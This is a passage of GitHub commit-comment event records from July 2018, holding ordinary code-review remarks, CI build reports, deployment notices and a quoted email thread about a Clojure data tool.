{"id":"7979381699","type":"CommitCommentEvent","actor":{"login":"mattcam"},"repo":{"name":"sfmcdg/sfmcdg.github.io"},"payload":{"comment":{"id":29741096,"position":null,"line":null,"path":null,"commit_id":"53f38f9b7bb77ccb040f3c232ae7dd725dca6573","created_at":"2018-07-17T21:30:42Z","updated_at":"2018-07-17T21:30:42Z","author_association":"MEMBER","body":"Hello @vanditapandit and thanks for the comment requesting Journey Builder. Can you raise a ticket describing your requirement and what you would like included in a Journey Builder video here https://github.com/sfmcdg/awesome-salesforce-marketingcloud/issues\r\n\r\nPresentations from previous meetups can be found here https://github.com/sfmcdg/awesome-salesforce-marketingcloud#presentations-from-past-sfmcdg-meetups\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-17T21:30:42Z"}
{"id":"7979382229","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29741100,"position":null,"line":null,"path":null,"commit_id":"6ead5d04e36e215779fbc138d53e94baf16a2e10","created_at":"2018-07-17T21:30:49Z","updated_at":"2018-07-17T21:30:49Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-225](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-225).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-225-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T21:30:49Z"}
{"id":"7979385957","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29741106,"position":null,"line":null,"path":null,"commit_id":"3c32418c59d1df48c66a5f2bc817d7c01003fec3","created_at":"2018-07-17T21:31:39Z","updated_at":"2018-07-17T21:31:39Z","author_association":"COLLABORATOR","body":"I think you can do this with the `axes` keyword when initializing the block.   `axes=(3,4)` should work but I haven't tried it."}},"created_at":"2018-07-17T21:31:39Z"}
{"id":"7979386163","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29741107,"position":null,"line":null,"path":null,"commit_id":"8e926081181c56db65c4766c6665c2731e7dc650","created_at":"2018-07-17T21:31:42Z","updated_at":"2018-07-17T21:31:42Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-224](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-224).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-224-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T21:31:42Z"}
{"id":"7979393768","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29741123,"position":null,"line":null,"path":null,"commit_id":"168320d97a0674cc22c04ce036b314d3cbaea2f9","created_at":"2018-07-17T21:33:28Z","updated_at":"2018-07-17T21:33:28Z","author_association":"OWNER","body":"Good point. I removed that in case the section numbering changes. How about `Section 2.1` (the number of subsections is over the top I think).\r\n"}},"created_at":"2018-07-17T21:33:28Z"}
{"id":"7979394000","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29741126,"position":null,"line":null,"path":null,"commit_id":"168320d97a0674cc22c04ce036b314d3cbaea2f9","created_at":"2018-07-17T21:33:33Z","updated_at":"2018-07-17T21:33:33Z","author_association":"OWNER","body":"Good point. I removed that in case the section numbering changes. How about `Section 2.1` (the number of subsections is over the top I think).\r\n"}},"created_at":"2018-07-17T21:33:33Z"}
{"id":"7979403959","type":"CommitCommentEvent","actor":{"login":"haydeeR"},"repo":{"name":"haydeeR/Referrals"},"payload":{"comment":{"id":29741156,"position":null,"line":null,"path":null,"commit_id":"eeed71b8ed78b4f3f9ac8367aeec74c049da828e","created_at":"2018-07-17T21:36:55Z","updated_at":"2018-07-17T21:36:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bug refreshing when the opening detail appear](https://trello.com/c/HndBsSHw/49-bug-refreshing-when-the-opening-detail-appear)"}},"created_at":"2018-07-17T21:36:55Z"}
{"id":"7979405093","type":"CommitCommentEvent","actor":{"login":"michaelasper"},"repo":{"name":"michaelasper/Holograph"},"payload":{"comment":{"id":29741159,"position":null,"line":null,"path":null,"commit_id":"414f295d01c7e39c8613f3ccddc6ed182d9352c8","created_at":"2018-07-17T21:37:19Z","updated_at":"2018-07-17T21:37:19Z","author_association":"OWNER","body":"wow"}},"created_at":"2018-07-17T21:37:19Z"}
{"id":"7979405251","type":"CommitCommentEvent","actor":{"login":"Kody-J"},"repo":{"name":"Kody-J/CS-404-Project"},"payload":{"comment":{"id":29741161,"position":null,"line":null,"path":null,"commit_id":"95833ac1c81d7d1863efa7ca2ef67fb2a6671c0e","created_at":"2018-07-17T21:37:22Z","updated_at":"2018-07-17T21:37:22Z","author_association":"OWNER","body":"Functions for finding next closest Zip"}},"created_at":"2018-07-17T21:37:22Z"}
{"id":"7979425442","type":"CommitCommentEvent","actor":{"login":"KazunoriOhnishi"},"repo":{"name":"KazunoriOhnishi/Unity2018"},"payload":{"comment":{"id":29741220,"position":null,"line":null,"path":null,"commit_id":"5d78c905e2d3aa212e441e935f3c9b89b776f179","created_at":"2018-07-17T21:44:07Z","updated_at":"2018-07-17T21:44:07Z","author_association":"OWNER","body":"MobileTiny"}},"created_at":"2018-07-17T21:44:07Z"}
{"id":"7979435249","type":"CommitCommentEvent","actor":{"login":"rachmadaniHaryono"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":29741239,"position":null,"line":null,"path":null,"commit_id":"982db164af4fdf568642c380daff9ac4c97ca2f1","created_at":"2018-07-17T21:46:52Z","updated_at":"2018-07-17T21:46:52Z","author_association":"COLLABORATOR","body":"it seems the failure is unrelated to commit,\r\n\r\ni will create pr for this"}},"created_at":"2018-07-17T21:46:52Z"}
{"id":"7979435567","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741241,"position":70,"line":80,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T21:46:55Z","updated_at":"2018-07-17T21:46:55Z","author_association":"NONE","body":"Wow that is some high-flying without a safety net here. You are relying on the fact that `owner` has been set beforehand in the `Owned` constructor...\r\nBetter put all those initialisation things explicitly in the constructor."}},"created_at":"2018-07-17T21:46:55Z"}
{"id":"7979437287","type":"CommitCommentEvent","actor":{"login":"mpbelhorn"},"repo":{"name":"django-helpdesk/django-helpdesk"},"payload":{"comment":{"id":29741245,"position":39,"line":410,"path":"helpdesk/views/staff.py","commit_id":"4d78bc85cabbe657b752c7700103ce98171613ca","created_at":"2018-07-17T21:47:15Z","updated_at":"2018-07-17T21:47:15Z","author_association":"NONE","body":"Updated status of this in #624."}},"created_at":"2018-07-17T21:47:15Z"}
{"id":"7979437799","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741248,"position":209,"line":186,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T21:47:21Z","updated_at":"2018-07-17T21:47:21Z","author_association":"NONE","body":"You could make this function `payable` and `.add(msg.value)`."}},"created_at":"2018-07-17T21:47:21Z"}
{"id":"7979440383","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":29741252,"position":null,"line":null,"path":null,"commit_id":"982db164af4fdf568642c380daff9ac4c97ca2f1","created_at":"2018-07-17T21:47:51Z","updated_at":"2018-07-17T21:47:51Z","author_association":"OWNER","body":"Thanks!"}},"created_at":"2018-07-17T21:47:51Z"}
{"id":"7979446402","type":"CommitCommentEvent","actor":{"login":"aiwilliams"},"repo":{"name":"lifeomic/jupiterone-aws-integration"},"payload":{"comment":{"id":29741258,"position":35,"line":35,"path":"cloudformation/jupiterone-cloudformation.json","commit_id":"49a2b7db813f39f8b01be989750ad042483997aa","created_at":"2018-07-17T21:49:08Z","updated_at":"2018-07-17T21:49:08Z","author_association":"NONE","body":"I've never used CloudFormation... does `JupiterOneRole` become the name of the role? Any reason it cannot match the name recommended in the `README.md`?\r\n\r\n> Enter `JupiterOne` as the **Role Name**"}},"created_at":"2018-07-17T21:49:08Z"}
{"id":"7979451240","type":"CommitCommentEvent","actor":{"login":"alexmingoia"},"repo":{"name":"unitedvote/united.vote"},"payload":{"comment":{"id":29741270,"position":null,"line":null,"path":null,"commit_id":"52729955f55c25f8835811b327ea95fb134b3daa","created_at":"2018-07-17T21:50:13Z","updated_at":"2018-07-17T21:50:13Z","author_association":"MEMBER","body":"There's already an explanation of what proxies are when no proxies have been chosen, so this looks kind of weird/redundant:\r\n\r\n<img width=\"2032\" alt=\"screen shot 2018-07-17 at 2 49 18 pm\" src=\"https://user-images.githubusercontent.com/1112718/42847391-a1bee9ee-89d0-11e8-9837-b801e466ed3b.png\">\r\n"}},"created_at":"2018-07-17T21:50:13Z"}
{"id":"7979454206","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741275,"position":240,"line":214,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T21:50:53Z","updated_at":"2018-07-17T21:50:53Z","author_association":"NONE","body":"Same here, could use `msg.value`."}},"created_at":"2018-07-17T21:50:53Z"}
{"id":"7979458169","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29741283,"position":null,"line":null,"path":null,"commit_id":"b1c9107c24059abb5edc8bbfc6ccb5ece226938d","created_at":"2018-07-17T21:51:49Z","updated_at":"2018-07-17T21:51:49Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-813](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-813).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-813-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T21:51:49Z"}
{"id":"7979458398","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741284,"position":267,"line":241,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T21:51:52Z","updated_at":"2018-07-17T21:51:52Z","author_association":"NONE","body":"I would say `onlyWhenAfterDeadline(id)`"}},"created_at":"2018-07-17T21:51:52Z"}
{"id":"7979458558","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29741286,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-17T21:51:54Z","updated_at":"2018-07-17T21:51:54Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2315 of 2315 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-17T21:51:54Z"}
{"id":"7979459006","type":"CommitCommentEvent","actor":{"login":"dsernst"},"repo":{"name":"unitedvote/united.vote"},"payload":{"comment":{"id":29741288,"position":null,"line":null,"path":null,"commit_id":"52729955f55c25f8835811b327ea95fb134b3daa","created_at":"2018-07-17T21:52:00Z","updated_at":"2018-07-17T21:52:00Z","author_association":"MEMBER","body":"Yeah, good point. Let's revert."}},"created_at":"2018-07-17T21:52:00Z"}
{"id":"7979459888","type":"CommitCommentEvent","actor":{"login":"DavePretlow"},"repo":{"name":"DavePretlow/2720-Working"},"payload":{"comment":{"id":29741289,"position":null,"line":null,"path":null,"commit_id":"b307be1cfc5d26f32042348ab0763f165bcf0870","created_at":"2018-07-17T21:52:11Z","updated_at":"2018-07-17T21:52:11Z","author_association":"OWNER","body":"Here is a brief history of the Project from my perspective and my role in it.  \r\nWe met initially and were somewhat overly ambitious about the scope of the app we would build.  We simplified our goal to be an app where drivers gave rides to passengers. \r\nWe never specifically assigned a group leader - I offered to become the Leader, but mostly played the role of encouragement as we struggled to meet and achieve our deadlines early enough.  At the point where we defined roles, I took on the Role of Lead Graphics and built a GUI based on a Program sketch I received from Kevin.\r\nThe goal was to use a LinkedList Structure of CarRiders and for each Route Offered a Queue Structure of CarDriver Objects in a Database .  I became a little confused about how to program the system with a GUI and NO database.  And I am still unsure what steps we needed to take to make this successful. As Group Leader I clearly failed, but I did a significant amount of work (in terms of time spent) on the Graphics component and the conceptualization of the design as I understood it."}},"created_at":"2018-07-17T21:52:11Z"}
{"id":"7979461918","type":"CommitCommentEvent","actor":{"login":"mehdisagar"},"repo":{"name":"mehdisagar/Code_C"},"payload":{"comment":{"id":29741297,"position":null,"line":null,"path":null,"commit_id":"697cfb74263c102cd9ddf397334e5be80b521d72","created_at":"2018-07-17T21:52:38Z","updated_at":"2018-07-17T21:52:38Z","author_association":"OWNER","body":"reading and writing from and to a file in C++ using <fstream>"}},"created_at":"2018-07-17T21:52:38Z"}
{"id":"7979462323","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"matklad/select-2018"},"payload":{"comment":{"id":29741299,"position":11,"line":12,"path":"src/concurrency.rs","commit_id":"d49345bed129c5121c7013578b4b7a4d21a6c7fe","created_at":"2018-07-17T21:52:43Z","updated_at":"2018-07-17T21:52:43Z","author_association":"OWNER","body":"This mysteriously changes return type from `usize` to `bool`."}},"created_at":"2018-07-17T21:52:43Z"}
{"id":"7979464663","type":"CommitCommentEvent","actor":{"login":"mjcurran99"},"repo":{"name":"mjcurran99/Responsive-Portfolio"},"payload":{"comment":{"id":29741302,"position":null,"line":null,"path":null,"commit_id":"f1e308bbc8329de12e07daa91bb1e4f8d5053068","created_at":"2018-07-17T21:53:16Z","updated_at":"2018-07-17T21:53:16Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-17T21:53:16Z"}
{"id":"7979465124","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29741307,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-17T21:53:22Z","updated_at":"2018-07-17T21:53:22Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-17T21:53:22Z"}
{"id":"7979465405","type":"CommitCommentEvent","actor":{"login":"donaldrshade"},"repo":{"name":"LightSys/emailhelper-2"},"payload":{"comment":{"id":29741308,"position":null,"line":null,"path":null,"commit_id":"69285dccd96288196e880fa8492a0a7c41d2b34f","created_at":"2018-07-17T21:53:26Z","updated_at":"2018-07-17T21:53:26Z","author_association":"CONTRIBUTOR","body":"Known bugs in the commit.\r\nBug in messages not being in the correct order  due to get mail not putting them in the correct order\r\nPotential fixes include a simple sorting of the list of conversations, or changing getMail.\r\nBug in the contact list. If you delete a contact from the database list while the inbox list is refreshing it does not delete it in the second list and is still selected like a database contact.\r\nPotential fixes include editing so we force a restart in the async loop. I'm not sure this is the best course. We could possibly redo it with a .contains type deal."}},"created_at":"2018-07-17T21:53:26Z"}
{"id":"7979468905","type":"CommitCommentEvent","actor":{"login":"Aubynj"},"repo":{"name":"Aubynj/PayRoll-System"},"payload":{"comment":{"id":29741315,"position":40,"line":40,"path":"README.md","commit_id":"60d584c04025ecd7b95743962186b109ff483cf1","created_at":"2018-07-17T21:54:15Z","updated_at":"2018-07-17T21:54:15Z","author_association":"OWNER","body":"* John Aubyn  _Initial Work_ [Sofware Developer](http://aubynj.github.io)"}},"created_at":"2018-07-17T21:54:15Z"}
{"id":"7979469762","type":"CommitCommentEvent","actor":{"login":"cozpon"},"repo":{"name":"cozpon/Redbubble"},"payload":{"comment":{"id":29741316,"position":null,"line":null,"path":null,"commit_id":"0b4da979fb9652eadd597da4e9dc3cdf5859a9ae","created_at":"2018-07-17T21:54:27Z","updated_at":"2018-07-17T21:54:27Z","author_association":"OWNER","body":"Corrected grammar, added clickable link, and overall clarity to the README"}},"created_at":"2018-07-17T21:54:27Z"}
{"id":"7979474461","type":"CommitCommentEvent","actor":{"login":"brankoculum"},"repo":{"name":"plinko-team/plinko"},"payload":{"comment":{"id":29741330,"position":null,"line":null,"path":null,"commit_id":"ded73812b1466174a07a431f8e0e8156426a7645","created_at":"2018-07-17T21:55:31Z","updated_at":"2018-07-17T21:55:31Z","author_association":"COLLABORATOR","body":"Co-authored-by: Branko Culum <brankoculum@users.noreply.github.com>\r\nCo-authored-by: Ryann McQuilton <20259631+ryannmcq@users.noreply.github.com>\r\nCo-authored-by: Josh Nelson <22858810+JoshCNelson@users.noreply.github.com>"}},"created_at":"2018-07-17T21:55:31Z"}
{"id":"7979474472","type":"CommitCommentEvent","actor":{"login":"LJRankin"},"repo":{"name":"LJRankin/google-homepage"},"payload":{"comment":{"id":29741331,"position":null,"line":null,"path":null,"commit_id":"be8e6f4bfcd8a982c85124e476d4ac919182c30a","created_at":"2018-07-17T21:55:31Z","updated_at":"2018-07-17T21:55:31Z","author_association":"OWNER","body":"For this mini-project, you’ll deconstruct an existing web page and rebuild it. Don’t worry if the links don’t go anywhere and the search box doesn’t do anything when you submit it. The goal is to start thinking about how elements get placed on the page and roughly how they get styled and aligned. For some of you, this may be the first time you’ve actually tried to “build” something in HTML (very exciting!).\r\n[From The Odin Project's [curriculum](http://www.theodinproject.com/courses/web-development-101/lessons/html-css)(url)\r\n"}},"created_at":"2018-07-17T21:55:31Z"}
{"id":"7979476722","type":"CommitCommentEvent","actor":{"login":"Aubynj"},"repo":{"name":"Aubynj/PayRoll-System"},"payload":{"comment":{"id":29741343,"position":40,"line":40,"path":"README.md","commit_id":"60d584c04025ecd7b95743962186b109ff483cf1","created_at":"2018-07-17T21:56:03Z","updated_at":"2018-07-17T21:56:03Z","author_association":"OWNER","body":"* John Aubyn  _Initial Work_ [Software Developer](http://aubynj.github.io)"}},"created_at":"2018-07-17T21:56:03Z"}
{"id":"7979477318","type":"CommitCommentEvent","actor":{"login":"brankoculum"},"repo":{"name":"plinko-team/plinko"},"payload":{"comment":{"id":29741346,"position":null,"line":null,"path":null,"commit_id":"d70833ec2696abae2d445e70c3598593f10472c2","created_at":"2018-07-17T21:56:11Z","updated_at":"2018-07-17T21:56:11Z","author_association":"COLLABORATOR","body":"Co-authored-by: Branko Culum <brankoculum@users.noreply.github.com>\r\nCo-authored-by: Ryann McQuilton <20259631+ryannmcq@users.noreply.github.com>\r\nCo-authored-by: Josh Nelson <22858810+JoshCNelson@users.noreply.github.com>"}},"created_at":"2018-07-17T21:56:11Z"}
{"id":"7979477410","type":"CommitCommentEvent","actor":{"login":"MdNazmul9"},"repo":{"name":"MdNazmul9/leetcode-solution"},"payload":{"comment":{"id":29741348,"position":null,"line":null,"path":null,"commit_id":"885592604db0305ba7a5c6b58b908897a72caa3c","created_at":"2018-07-17T21:56:13Z","updated_at":"2018-07-17T21:56:13Z","author_association":"OWNER","body":"removesDuplicates from sorted array"}},"created_at":"2018-07-17T21:56:13Z"}
{"id":"7979478075","type":"CommitCommentEvent","actor":{"login":"dtarb"},"repo":{"name":"hydroshare/hydroshare"},"payload":{"comment":{"id":29741351,"position":null,"line":null,"path":null,"commit_id":"074f93cd8c698a1b176bf1f80ecc81b18e68f1db","created_at":"2018-07-17T21:56:22Z","updated_at":"2018-07-17T21:56:22Z","author_association":"MEMBER","body":"This leads to content from zip files getting ever deeper in file hierarchies.  I can live with it, but I do not like it.  I cannot tell you how many times I unzip a file and then move all the content up one folder to not have one folder in one folder, often with the same name before getting to content.  "}},"created_at":"2018-07-17T21:56:22Z"}
{"id":"7979480399","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson1"},"payload":{"comment":{"id":29741356,"position":2,"line":2,"path":"diskrim.rb","commit_id":"a84da1dcd83a820e44d5dcfa0c4b3c1391f75644","created_at":"2018-07-17T21:56:56Z","updated_at":"2018-07-17T21:56:56Z","author_association":"NONE","body":"по обеим сторонам от  = надо ставить пробелы"}},"created_at":"2018-07-17T21:56:56Z"}
{"id":"7979480463","type":"CommitCommentEvent","actor":{"login":"vwadekar"},"repo":{"name":"ARM-software/arm-trusted-firmware"},"payload":{"comment":{"id":29741357,"position":null,"line":null,"path":null,"commit_id":"c426fd709fcf15f4643ac6729425c205d0ac1683","created_at":"2018-07-17T21:56:57Z","updated_at":"2018-07-17T21:56:57Z","author_association":"NONE","body":"Looks ok"}},"created_at":"2018-07-17T21:56:57Z"}
{"id":"7979480731","type":"CommitCommentEvent","actor":{"login":"joshuaulrich"},"repo":{"name":"joshuaulrich/xts"},"payload":{"comment":{"id":29741358,"position":null,"line":null,"path":null,"commit_id":"50b2510a5407505e2a1d8c5c0c0e17fb899aaa5d","created_at":"2018-07-17T21:57:01Z","updated_at":"2018-07-17T21:57:01Z","author_association":"OWNER","body":"I don't think `tclass` was ever used in xts package code, but `.xts()` is exported, so a user could have specified it in their script or non-CRAN package."}},"created_at":"2018-07-17T21:57:01Z"}
{"id":"7979482283","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson1"},"payload":{"comment":{"id":29741361,"position":11,"line":11,"path":"diskrim.rb","commit_id":"a84da1dcd83a820e44d5dcfa0c4b3c1391f75644","created_at":"2018-07-17T21:57:24Z","updated_at":"2018-07-17T21:57:24Z","author_association":"NONE","body":"вокруг операторов *, /, +, >, < и т.д, пробелы с обоих сторон должны быть"}},"created_at":"2018-07-17T21:57:24Z"}
{"id":"7979483532","type":"CommitCommentEvent","actor":{"login":"Angristan"},"repo":{"name":"Stephanyan/tic-tac-toe"},"payload":{"comment":{"id":29741364,"position":null,"line":null,"path":null,"commit_id":"05880ab277b1060de1bf12357cb42aed823e4830","created_at":"2018-07-17T21:57:42Z","updated_at":"2018-07-17T21:57:42Z","author_association":"NONE","body":"C'est bien ça le refactoring \r\n"}},"created_at":"2018-07-17T21:57:42Z"}
{"id":"7979483741","type":"CommitCommentEvent","actor":{"login":"j-f1"},"repo":{"name":"desktop/desktop"},"payload":{"comment":{"id":29741365,"position":5,"line":61,"path":"app/src/lib/api.ts","commit_id":"0ddb3722f4938f41bcf200f79f63effa52fcec8a","created_at":"2018-07-17T21:57:46Z","updated_at":"2018-07-17T21:57:46Z","author_association":"MEMBER","body":"It looks like the only plans a *user* can have (as opposed to a team) are free and developer. ([source](https://github.com/pricing))"}},"created_at":"2018-07-17T21:57:46Z"}
{"id":"7979484308","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson1"},"payload":{"comment":{"id":29741367,"position":18,"line":18,"path":"diskrim.rb","commit_id":"a84da1dcd83a820e44d5dcfa0c4b3c1391f75644","created_at":"2018-07-17T21:57:55Z","updated_at":"2018-07-17T21:57:55Z","author_association":"NONE","body":"корень из дискриминанта надо вычислять один раз и его использовать"}},"created_at":"2018-07-17T21:57:55Z"}
{"id":"7979486666","type":"CommitCommentEvent","actor":{"login":"joelagnel"},"repo":{"name":"joelagnel/linux"},"payload":{"comment":{"id":29741374,"position":null,"line":null,"path":null,"commit_id":"ad3a1d2adc66365fd282e9150d36180438f0d225","created_at":"2018-07-17T21:58:30Z","updated_at":"2018-07-17T21:58:30Z","author_association":"OWNER","body":"CL merged into 4.9"}},"created_at":"2018-07-17T21:58:30Z"}
{"id":"7979487591","type":"CommitCommentEvent","actor":{"login":"mpavlak1"},"repo":{"name":"fsdonks/demand_builder"},"payload":{"comment":{"id":29741375,"position":null,"line":null,"path":null,"commit_id":"e2446b99646f986e8c77c47d0bd741be6e500606","created_at":"2018-07-17T21:58:43Z","updated_at":"2018-07-17T21:58:43Z","author_association":"CONTRIBUTOR","body":"CLASSIFICATION: UNCLASSIFIED\r\n\r\n>>Started working on the slides a little. Still unsure what level exactly to talk about demand_builder.\r\n\r\nI would say pretty high level for an ARB panel.  Assume audience has no programming knowledge.  Unless Tom beats me to it, I could help with ideas once I have a minute after this med stuff.\r\n\r\n-----Original Message-----\r\nFrom: Pavlak, Michael M CIV (US) \r\nSent: Tuesday, July 17, 2018 3:45 PM\r\nTo: fsdonks/demand_builder <reply@reply.github.com>\r\nCc: Spoon, Thomas L CIV (US) <thomas.l.spoon.civ@mail.mil>; Flewelling, Craig J CIV USARMY CAA (US) <craig.j.flewelling.civ@mail.mil>\r\nSubject: RE: [Non-DoD Source] Re: [fsdonks/demand_builder] completely automated from root (e2446b9)\r\n\r\nTried to make demand_builder completely automated and not even need the input-map file describing which files are what type.\r\n\r\nWas able to determine which files where MAP and CONSOLIDATED based on header. These files should also only have one sheet. \r\nIf the file is not either a MAP or CONSOLIDATED,  it should be a FORGE and contain Unit_Node_Detail or SRC_By_Day sheet  (Unit_Node_Detail always used first, SRC_By_Day only used when it does not exist)\r\n\r\nAn exception will be thrown asking for the user's input if the MAP or CONSOLIDATED contain multiple sheets or FORGE does not have either sheets.\r\n\r\nDetermining which ForceCode is associated with each FORGE might still cause problems (produce logical errors, will run fine).\r\nNowhere in the FORGE files does it indicate what scenario the file is for.\r\nThe only data I could use to try to guess which file is each FC was to use the filename and duration.\r\n\r\nCreated a heuristic that matches FORGE files to FCs listed in the map by adding the amount different the FC is from the filename and the difference between the duration of the FORGE and durations listed in the map (squared this value to give it more weight, can adjust as needed).\r\nOnce a FC is matched to a FORGE, it can't be matched again (no duplicate FCs for FORGEs). \r\n\r\nNeed to add a gui displaying the matching demand_builder came up with and the ability for the user to verify and adjust any of the incorrect automated matches. \r\nNeed to also clean up some up some of the stuff in m4plugin.\r\n\r\nStill working on a way to be able to read the SRC_By_Day sheet without needing to override the tabular-region function. \r\n\r\nAlso, there was a potential error when formatting the vignettes. Did not account for when vignettes have multiple runs (0-100 and then 200-300). \r\nThis should be fixed now.\r\n   \r\nStarted working on the slides a little. Still unsure what level exactly to talk about demand_builder.\r\n\r\n-----Original Message-----\r\nFrom: fs-tom [mailto:notifications@github.com]\r\nSent: Tuesday, July 17, 2018 3:30 PM\r\nTo: fsdonks/demand_builder <demand_builder@noreply.github.com>\r\nCc: Pavlak, Michael M CIV (US) <michael.m.pavlak.civ@mail.mil>; Mention <mention@noreply.github.com>\r\nSubject: [Non-DoD Source] Re: [fsdonks/demand_builder] completely automated from root (e2446b9)\r\n\r\nAll active links contained in this email were disabled. Please verify the identity of the sender, and confirm the authenticity of all links contained within the message prior to copying and pasting the address to a Web browser. \r\n\r\n\r\n________________________________\r\n\r\n\r\n\r\n\r\n@mpavlak1 < Caution-https://github.com/mpavlak1 >  @fs-craig < Caution-https://github.com/fs-craig > \r\n\r\n1.\tAvoid using :refer-all....this occludes where your symbols came from in the source. It's a few extra bits to use the ns alias like doc/.... or xl/...., and it helps other people read/maintain your code significantly. Alternately...if you're only pulling in a few functions....then :refer [fn1 fn2 ....] is more acceptable since readers can scan up to the NS to find undefined, non-clojure.core functions that are used in the body.\r\n\r\n2.\tbetter idiom then (first (filter #(= \"blah\" %) xs)) is (some #{\"blah\"} coll).\r\n\r\n3.\tdon't need to coerce to tabdelimited to get records in sheet->records. tbl/table-records can be called to get a record sequence directly on a table. spork.util.tables are also reducible, acting like a sequence of records ala tbl/table-records. You do this in file->records and sheet->records.\r\n\r\n4.\tread-sheet is redefined multiple times....\r\n\r\n5.\theader-count: maybe pull out the repeated calls to (set ....) into a let binding, compute the set once, then re-use it. I don't think the compiler is sufficiently smart enough to do that for you (could be wrong).\r\n\r\n6.\tyou're slinking back to interop.....use functions in java.util.io and spork.util.io, like jio/delete-file or io/delete-file-recursively (works on single files and directories). Use io/file (it's got portable path processing, posix friendly). io/list-files also exists.\r\n\r\n7.\tuse cond or case (or even 'or/and ) instead of nested ifs....\r\n\r\n8.\tin root->inputmap, you're holding onto the head of a lazy sequence in the let binding for lines. This may not matter here, but if the sequence is big enough, it won't be GC'd dynamically (defeating one purpose of laziness). If you moved that to the do-seq binding, it would be generated and consumed on demand, and GC'd along the way (i.e. you could work over large files without blowing up the heap). May 